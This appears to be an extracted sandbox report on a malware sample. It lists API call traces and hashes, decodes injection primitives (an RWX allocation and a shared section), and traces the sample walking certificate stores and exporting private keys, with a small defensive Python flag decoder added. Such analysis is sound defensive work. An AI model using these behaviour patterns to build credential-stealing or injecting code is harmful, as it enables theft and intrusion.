• Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
• Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

Control-flow Graph
Control-flow graph (rendered as an image in the original report; only its summary survives extraction): function entry 01FA003C, basic blocks 1fa003c-1fa091d, with calls to VirtualAlloc, VirtualProtect, VirtualFree and LoadLibraryA.
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01FA024D
Strings
Memory Dump Source
• Source File: 00000008.00000002.2576079643.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1fa0000_hdhruer.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 2986c96ea02455e376ab3f8f91fd8668def29363e1ec19eb6efd90f862458d90
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: 835289B5A00229DFDB64CF58D984BACBBB1BF09304F5480D9E94DAB351DB35AA84CF14

Control-flow Graph
Control-flow graph (rendered as an image in the original report; only its summary survives extraction): function entry 004B239D, basic blocks 4b239d-4b23fb, with calls to CreateToolhelp32Snapshot and Module32First.
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004B23C5
• Module32First.KERNEL32(00000000,00000224), ref: 004B23E5
Memory Dump Source
• Source File: 00000008.00000002.2574353685.00000000004A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4a0000_hdhruer.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: f12833529483d4ba3cca70eb428bc7606b885c612647e918719144ba3a1f2c72
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: 85F0C232100315ABD7203BF5A98CAAB72E8BF49324F10152AEA42D11C0CAF8EC458675

Control-flow Graph
Control-flow graph (rendered as an image in the original report; only its summary survives extraction): function entry 01FA0E0F, basic blocks 1fa0e0f-1fa0e2c, with two calls to SetErrorMode.
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,01FA0223,?,?), ref: 01FA0E19
• SetErrorMode.KERNELBASE(00000000,?,?,01FA0223,?,?), ref: 01FA0E1E
Memory Dump Source
• Source File: 00000008.00000002.2576079643.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1fa0000_hdhruer.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: cb8a2fa6b6314028a024efa7a5c923e9ca64f27433e393fd74be4ccb9015de38
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: 44D01231545128B7DB002A94DC09BCD7F1CDF09B62F408011FB0DD9080CB75954046E5

Control-flow Graph
Control-flow graph (rendered as an image in the original report; only its summary survives extraction): function entry 004019C0, basic blocks 4019c0-401a9a, with a call to Sleep.
APIs
• Sleep.KERNELBASE(00001388), ref: 00401A31
Memory Dump Source
• Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
• Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
• Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
• Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F

                                                                                                                                         Control-flow Graph
                                                                                                                                         • Function 4019e0-401a9a: blocks call 40127e, Sleep, 4014fb and 4015fb (node/edge list of the rendered graph omitted)
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                                        • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                                                                                                        • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                                        • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F

                                                                                                                                         Control-flow Graph
                                                                                                                                         • Function 4019eb-401a9a: blocks call 40127e, Sleep, 4014fb and 4015fb (node/edge list of the rendered graph omitted)
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                                        • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                                                                                                        • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                                        • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B

                                                                                                                                         Control-flow Graph
                                                                                                                                         • Function 401a04-401a9a: blocks call 40127e, Sleep, 4014fb and 4015fb (node/edge list of the rendered graph omitted)
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                                                        • Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
                                                                                                                                        • Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                                                        • Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                                                        • Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
                                                                                                                                        • Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                                                        • Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004B20AD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2574353685.00000000004A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_4a0000_hdhruer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction ID: 22139d9f4d49158939a70f65387c23ac1f1c2ecd23adf37a7f1e57fcb2dc7f71
                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction Fuzzy Hash: 09113F79A00208EFDB01DF98CA85E99BBF5AF08350F058095FA489B361D375EA90DF94
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                                                        • Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
                                                                                                                                        • Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                                                        • Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4152845823-0
                                                                                                                                        • Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                                                        • Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
                                                                                                                                        • Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                                                        • Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B
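                                                                                                                                         The argument lists in the API entries above are raw hex words. For triage the flag parameters are what matter: Sleep 00001388 is 5000 ms; NtCreateSection is called with DesiredAccess 00000006 (SECTION_MAP_WRITE | SECTION_MAP_READ), SectionPageProtection 00000004 (PAGE_READWRITE), AllocationAttributes 08000000 (SEC_COMMIT, not SEC_IMAGE) and a zero FileHandle, i.e. a pagefile-backed, writable section that can be mapped into another process; VirtualAlloc is called with 00001000 (MEM_COMMIT) and 00000040 (PAGE_EXECUTE_READWRITE), a fresh RWX region; NtDuplicateObject uses Options 00000002 (DUPLICATE_SAME_ACCESS). The Python below is an added example and is not code from the Joe Sandbox report: it parses the report's own API lines (copied in as constructed input) and decodes those parameters with the documented Windows constants. It assumes that the values the report prints past an API's prototype (the trailing ?,00000079 entries) are stack residue that can be ignored, and that the line format is exactly the one shown in these blocks.

```python
"""Decode the flag arguments in Joe Sandbox 'APIs' lines.

Added example, not code from the Joe Sandbox report. The decoding tables are
the documented Win32/NT constants (winnt.h, ntifs.h). Assumption: values the
report prints past an API's prototype (e.g. the trailing ?,00000079) are stack
residue and are ignored by the flag decoder.
"""
import re

# Constructed input: the four distinct API lines from the report blocks above,
# whitespace trimmed, otherwise verbatim.
REPORT_LINES = [
    "Sleep.KERNELBASE(00001388), ref: 00401A31",
    "Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,"
    "000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE",
    "Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,"
    "?,00000004,08000000,00000000,?,00000079), ref: 004016EB",
    "VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004B20AD",
]

LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# Single-bit flag tables. Every entry is one bit, so a value decodes bit by bit.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
                0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
SEC_ATTR = {0x00800000: "SEC_FILE", 0x01000000: "SEC_IMAGE", 0x04000000: "SEC_RESERVE",
            0x08000000: "SEC_COMMIT", 0x10000000: "SEC_NOCACHE",
            0x40000000: "SEC_WRITECOMBINE", 0x80000000: "SEC_LARGE_PAGES"}
SECTION_ACCESS = {0x01: "SECTION_QUERY", 0x02: "SECTION_MAP_WRITE", 0x04: "SECTION_MAP_READ",
                  0x08: "SECTION_MAP_EXECUTE", 0x10: "SECTION_EXTEND_SIZE"}
MEM_ALLOC = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x20000000: "MEM_LARGE_PAGES"}
DUP_OPTIONS = {0x1: "DUPLICATE_CLOSE_SOURCE", 0x2: "DUPLICATE_SAME_ACCESS",
               0x4: "DUPLICATE_SAME_ATTRIBUTES"}

# 0-based positions of the flag-typed parameters in each API's prototype.
FLAG_ARGS = {
    # NtCreateSection(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize,
    #                 SectionPageProtection, AllocationAttributes, FileHandle)
    "NtCreateSection": {1: SECTION_ACCESS, 4: PAGE_PROTECT, 5: SEC_ATTR},
    # VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
    "VirtualAlloc": {2: MEM_ALLOC, 3: PAGE_PROTECT},
    # NtDuplicateObject(SourceProcess, SourceHandle, TargetProcess, TargetHandle,
    #                   DesiredAccess, HandleAttributes, Options)
    "NtDuplicateObject": {6: DUP_OPTIONS},
}


def parse_line(line):
    """Split one 'APIs' line into api, module, argument list, call site and caller.
    '?' (a value the sandbox could not resolve) becomes None."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    args = [None if a == "?" else int(a, 16) for a in m["args"].split(",") if a]
    return {"api": m["api"], "module": m["module"], "args": args,
            "ref": int(m["ref"], 16),
            "caller": int(m["caller"], 16) if m["caller"] else None}


def decode_bits(value, table):
    """Name each set bit the table knows; unknown bits are kept as hex."""
    return [table.get(1 << b, hex(1 << b)) for b in range(32) if value & (1 << b)]


def decode_record(rec):
    """Return {arg_index: [flag names]} for the flag-typed arguments of rec."""
    out = {}
    for idx, table in FLAG_ARGS.get(rec["api"], {}).items():
        if idx < len(rec["args"]) and rec["args"][idx] is not None:
            out[idx] = decode_bits(rec["args"][idx], table)
    return out


def injection_primitives(lines):
    """Summarise the argument combinations that matter when judging injection."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        flags = decode_record(rec)
        api, args, ref = rec["api"], rec["args"], f"{rec['ref']:08X}"
        if api == "Sleep":
            findings.append(f"Sleep {args[0]} ms at {ref}")
        elif api == "NtDuplicateObject":
            findings.append(f"handle duplicated with {'|'.join(flags[6])} at {ref}")
        elif api == "NtCreateSection" and "SEC_COMMIT" in flags.get(5, []) and args[6] == 0:
            # No file handle and SEC_COMMIT: pagefile-backed shared memory, not an image.
            findings.append(f"pagefile-backed {'|'.join(flags[4])} section at {ref}")
        elif api == "VirtualAlloc" and "PAGE_EXECUTE_READWRITE" in flags.get(3, []):
            findings.append(f"RWX {'|'.join(flags[2])} at {ref}")
    return findings


if __name__ == "__main__":
    for finding in injection_primitives(REPORT_LINES):
        print(finding)
```

                                                                                                                                         Running it over the four lines yields one finding per line; the useful check is that the section is SEC_COMMIT with no file handle rather than SEC_IMAGE, which is what distinguishes a shareable memory buffer from a mapped executable image.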

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:22.8%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:5.9%
                                                                                                                                        Total number of Nodes:867
                                                                                                                                        Total number of Limit Nodes:43
                                                                                                                                         • Node/edge dump of the rendered graph omitted; API calls visible in its nodes, grouped by the functions that make them:
                                                                                                                                           • Heap and string helpers: GetProcessHeap, HeapAlloc, RtlReAllocateHeap, RtlFreeHeap, wvsprintfW, lstrcpyW, PathAppendW
                                                                                                                                           • Certificate store walk and export: CertEnumSystemStore, CertOpenStore, CertEnumCertificatesInStore, CertGetNameStringW, CertNameToStrW, FileTimeToSystemTime, CertGetCertificateContextProperty, CryptAcquireCertificatePrivateKey, CryptGetUserKey, CryptExportKey, CryptAcquireContextA, CryptImportKey, CertAddCertificateLinkToStore, CertSetCertificateContextProperty, PFXExportCertStoreEx, CertCloseStore; LoadLibraryA, GetProcAddress and VirtualProtect are called between the CryptExportKey attempts
                                                                                                                                           • Smart card enumeration: SCardListCardsW, SCardGetStatusChangeW, SCardFreeMemory
                                                                                                                                           • Other: RegGetValueW, OpenSCManagerA
7ff6f2d61990 4 API calls 4094->4095 4096 7ff6f2d6746e 4095->4096 4097 7ff6f2d61a70 5 API calls 4096->4097 4098 7ff6f2d67490 4097->4098 4099 7ff6f2d61a70 5 API calls 4098->4099 4100 7ff6f2d674a4 4099->4100 4141 7ff6f2d678ec 4100->4141 4103 7ff6f2d61990 4 API calls 4104 7ff6f2d674c5 4103->4104 4105 7ff6f2d61a70 5 API calls 4104->4105 4106 7ff6f2d674d9 4105->4106 4147 7ff6f2d679c4 GetNativeSystemInfo 4106->4147 4109 7ff6f2d61990 4 API calls 4110 7ff6f2d674fa 4109->4110 4149 7ff6f2d67138 CoInitializeEx CoInitializeSecurity CoCreateInstance 4110->4149 4112 7ff6f2d67503 4117 7ff6f2d675d1 4112->4117 4150 7ff6f2d6785c 4112->4150 4113 7ff6f2d6783c 4161 7ff6f2d67104 4113->4161 4117->4113 4118 7ff6f2d6785c 5 API calls 4117->4118 4121 7ff6f2d67629 4118->4121 4119 7ff6f2d6755b 4120 7ff6f2d6785c 5 API calls 4119->4120 4123 7ff6f2d67596 4120->4123 4122 7ff6f2d6785c 5 API calls 4121->4122 4125 7ff6f2d67664 4122->4125 4124 7ff6f2d6785c 5 API calls 4123->4124 4124->4117 4126 7ff6f2d6785c 5 API calls 4125->4126 4127 7ff6f2d6769f 4126->4127 4128 7ff6f2d6785c 5 API calls 4127->4128 4129 7ff6f2d676da 4128->4129 4130 7ff6f2d6785c 5 API calls 4129->4130 4131 7ff6f2d67715 4130->4131 4132 7ff6f2d6785c 5 API calls 4131->4132 4133 7ff6f2d67750 4132->4133 4134 7ff6f2d6785c 5 API calls 4133->4134 4135 7ff6f2d6778b 4134->4135 4136 7ff6f2d6785c 5 API calls 4135->4136 4137 7ff6f2d677c6 4136->4137 4138 7ff6f2d6785c 5 API calls 4137->4138 4139 7ff6f2d67801 4138->4139 4140 7ff6f2d6785c 5 API calls 4139->4140 4140->4113 4142 7ff6f2d67918 4141->4142 4143 7ff6f2d67977 LoadLibraryA GetProcAddress 4142->4143 4144 7ff6f2d674a9 4143->4144 4145 7ff6f2d67991 GetCurrentProcess IsWow64Process 4143->4145 4144->4103 4145->4144 4146 7ff6f2d679ad 4145->4146 4146->4144 4148 7ff6f2d674de 4147->4148 4148->4109 4149->4112 4151 7ff6f2d61990 4 API calls 4150->4151 4152 7ff6f2d67888 4151->4152 4153 7ff6f2d61990 4 API calls 4152->4153 4154 7ff6f2d67893 4153->4154 4155 7ff6f2d61990 4 API calls 4154->4155 4156 7ff6f2d678a2 
4155->4156 4164 7ff6f2d67034 4156->4164 4159 7ff6f2d61990 4 API calls 4160 7ff6f2d678d5 4159->4160 4160->4119 4162 7ff6f2d67116 CoUninitialize 4161->4162 4166 7ff6f2d67079 4164->4166 4165 7ff6f2d6707d 4165->4159 4166->4165 4168 7ff6f2d66004 4166->4168 4169 7ff6f2d6601a 4168->4169 4172 7ff6f2d67234 4169->4172 4181 7ff6f2d67310 4172->4181 4175 7ff6f2d66042 4176 7ff6f2d67260 4179 7ff6f2d61990 4 API calls 4176->4179 4177 7ff6f2d61990 4 API calls 4178 7ff6f2d67275 4177->4178 4180 7ff6f2d619e4 4 API calls 4178->4180 4179->4175 4180->4176 4182 7ff6f2d6733e 4181->4182 4183 7ff6f2d67362 4182->4183 4184 7ff6f2d67381 4182->4184 4187 7ff6f2d61a70 5 API calls 4183->4187 4185 7ff6f2d673bb 4184->4185 4191 7ff6f2d67395 4184->4191 4186 7ff6f2d61990 4 API calls 4185->4186 4188 7ff6f2d673ca 4186->4188 4190 7ff6f2d67251 4187->4190 4189 7ff6f2d61990 4 API calls 4188->4189 4192 7ff6f2d673d5 4189->4192 4190->4175 4190->4176 4190->4177 4193 7ff6f2d61a70 5 API calls 4191->4193 4194 7ff6f2d61990 4 API calls 4192->4194 4193->4190 4194->4190 4937 7ff6f2d661f8 4938 7ff6f2d6620e 4937->4938 4939 7ff6f2d67234 5 API calls 4938->4939 4940 7ff6f2d6623c 4939->4940 4941 7ff6f2d67234 5 API calls 4940->4941 4942 7ff6f2d6625c 4941->4942 4493 7ff6f2d631c4 4494 7ff6f2d631d7 4493->4494 4495 7ff6f2d61990 4 API calls 4494->4495 4496 7ff6f2d631e2 4495->4496 4497 7ff6f2d61990 4 API calls 4496->4497 4498 7ff6f2d631f1 CertEnumSystemStoreLocation 4497->4498 4499 7ff6f2d61990 4 API calls 4498->4499 4500 7ff6f2d63215 4499->4500 4959 7ff6f2d6dc0c 4960 7ff6f2d6dc60 4959->4960 4961 7ff6f2d61990 4 API calls 4960->4961 4962 7ff6f2d6dc96 4961->4962 4963 7ff6f2d61990 4 API calls 4962->4963 4964 7ff6f2d6dcad 4963->4964 5087 7ff6f2d6cbf4 RegOpenKeyExW 4964->5087 4966 7ff6f2d6dccd 4967 7ff6f2d61990 4 API calls 4966->4967 4968 7ff6f2d6dd30 4967->4968 4969 7ff6f2d61990 4 API calls 4968->4969 4970 7ff6f2d6dd47 4969->4970 4971 7ff6f2d6ccf8 6 API calls 4970->4971 4972 7ff6f2d6dd6c 4971->4972 4973 7ff6f2d6deb3 4972->4973 4976 
7ff6f2d6dd80 PathCombineW PathFileExistsW 4972->4976 4974 7ff6f2d61990 4 API calls 4973->4974 4975 7ff6f2d6dec2 4974->4975 4981 7ff6f2d61990 4 API calls 4975->4981 4977 7ff6f2d6dda6 PathQuoteSpacesW 4976->4977 5009 7ff6f2d6dea0 4976->5009 5093 7ff6f2d6cff0 4977->5093 4979 7ff6f2d625b4 2 API calls 4979->4973 4980 7ff6f2d6ddbc lstrcatW 5095 7ff6f2d6e8a4 4980->5095 4983 7ff6f2d6ded9 4981->4983 4985 7ff6f2d6cbf4 4 API calls 4983->4985 4987 7ff6f2d6def2 4985->4987 4986 7ff6f2d69644 2 API calls 4989 7ff6f2d6dde6 4986->4989 4988 7ff6f2d61990 4 API calls 4987->4988 4990 7ff6f2d6df0e 4988->4990 4989->4989 4992 7ff6f2d6900c 16 API calls 4989->4992 4991 7ff6f2d61990 4 API calls 4990->4991 4993 7ff6f2d6df1d 4991->4993 4994 7ff6f2d6de3b 4992->4994 4995 7ff6f2d61990 4 API calls 4993->4995 4996 7ff6f2d695a0 8 API calls 4994->4996 4999 7ff6f2d6de81 4994->4999 4997 7ff6f2d6df34 4995->4997 4998 7ff6f2d6de50 4996->4998 5002 7ff6f2d6df40 GetEnvironmentVariableW 4997->5002 5000 7ff6f2d6de77 4998->5000 5001 7ff6f2d697dc 16 API calls 4998->5001 5007 7ff6f2d625b4 2 API calls 4999->5007 5003 7ff6f2d69478 13 API calls 5000->5003 5004 7ff6f2d6de64 5001->5004 5005 7ff6f2d6df69 5002->5005 5006 7ff6f2d6e1e7 5002->5006 5003->4999 5004->5000 5010 7ff6f2d61990 4 API calls 5004->5010 5011 7ff6f2d6df75 PathAppendW PathFileExistsW 5005->5011 5008 7ff6f2d61990 4 API calls 5006->5008 5007->5009 5012 7ff6f2d6e1f6 5008->5012 5009->4979 5010->5000 5011->5006 5013 7ff6f2d6df9a CreateFileW 5011->5013 5015 7ff6f2d61990 4 API calls 5012->5015 5013->5006 5014 7ff6f2d6dfcf GetFileSize 5013->5014 5102 7ff6f2d625dc GetProcessHeap HeapAlloc 5014->5102 5017 7ff6f2d6e20d 5015->5017 5019 7ff6f2d6cbf4 4 API calls 5017->5019 5022 7ff6f2d6e22a 5019->5022 5025 7ff6f2d61990 4 API calls 5022->5025 5028 7ff6f2d6e246 5025->5028 5031 7ff6f2d61990 4 API calls 5028->5031 5034 7ff6f2d6e25d 5031->5034 5036 7ff6f2d6e269 GetEnvironmentVariableW 5034->5036 5038 7ff6f2d6e37c 5036->5038 5039 7ff6f2d6e28c 5036->5039 5040 7ff6f2d61990 4 
